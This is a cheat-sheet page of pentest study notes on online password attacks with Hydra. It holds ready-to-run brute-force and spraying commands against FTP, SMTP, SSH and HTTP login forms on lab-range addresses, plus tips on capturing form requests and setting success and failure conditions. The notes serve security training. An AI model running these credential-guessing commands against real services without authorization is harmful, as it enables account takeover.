Online attacks

Hydra

Hydra can perfom password attacks (one user - multiple pwds) such as spray attacks (multiple user - one pwds) just use hydra -L user-list.txt -p 12345

-l specific user “admin”

-L User list

-p specific password “12345”

-P password list

FTP

As example we attack an FTP server

hydra -l ftp -P passlist.txt [<ftp://10.10.x.x>](<ftp://10.10.x.x/>) -v

-l ftp we are specifying a single username, use-L for a username wordlist

-P Path specifying the full path of wordlist, you can specify a single password by using -p.

ftp://10.10.x.x the protocol and the IP address or the fully qualified domain name (FDQN) of the target.

-v detailed activity of hydra

SMTP/S

hydra -l email@company.xyz -P /path/to/wordlist.txt smtp://10.10.x.x:25 -v

hydra -l email@company.xyz -P /path/to/wordlist.txt smtps://10.10.x.x:465 -v

SSH

hydra -L users.lst -P /path/to/wordlist.txt ssh://10.10.x.x -v

HTTP

First we need to know what to bruteforce. important to specify the type of HTTP request (GET/POST) → attempt to log in and go to f12 → network

Finding & Specifying Location of Username/Password Form(s) This is the hardest part, but it’s actually surprisingly simple. Let’s head back over to our browser window. We should still have the Inspect Element window open on the Network Tab. With our Post request still selected, let’s click Edit and Resend.

Now we see a section called Request Body that contains the username and password you entered earlier! We’ll want to grab this entire request for Hydra to use.

In my case, the unmodified request looks like this: username=InfiniteLogins&password=Password

can also be username=admin&password=^PASS^ if known user = admin

hydra -l admin -P 500-worst-passwords.txt 10.10.x.x http-get-form "/login—et/index.php:username=^USER^&password=^PASS^:S=logout.php" -f

or (copy paste the error message so no typing happens)

hydra -l admin -P 500-worst-passwords.txt 10.10.x.x http-get-form "/login—et/index.php:username=^USER^&password=^PASS^:Invalid Password!" -f

  • l admin specifies a single username; use L for a username wordlist.

  • P Path specifies the full wordlist path; you can use p for a single password.

  • 10.10.x.x is the target's IP address or fully qualified domain name (FQDN).

  • http-get-form specifies the HTTP request type as either http-get-form or http-post-form.

  • login-get/index.php is the login page path on the target webserver.

  • username=^USER^&password=^PASS^ defines the parameters for brute-forcing, using ^USER^ for usernames and ^PASS^ for passwords from the specified dictionary.

The section below is crucial for avoiding false positives when using Hydra:

  • Specify the 'failed' condition with F=. (try login watch for an error message)

  • Set success conditions with S= based on server responses for failed and successful login attempts.

  • During enumeration, you can use knowledge about the server. For example, if you find that the server serves logout.php after a valid login, set S=logout.php.

  • Use f to stop brute-force attacks after finding valid credentials.

PreviousOffline AttacksNextSpraying attack

Last updated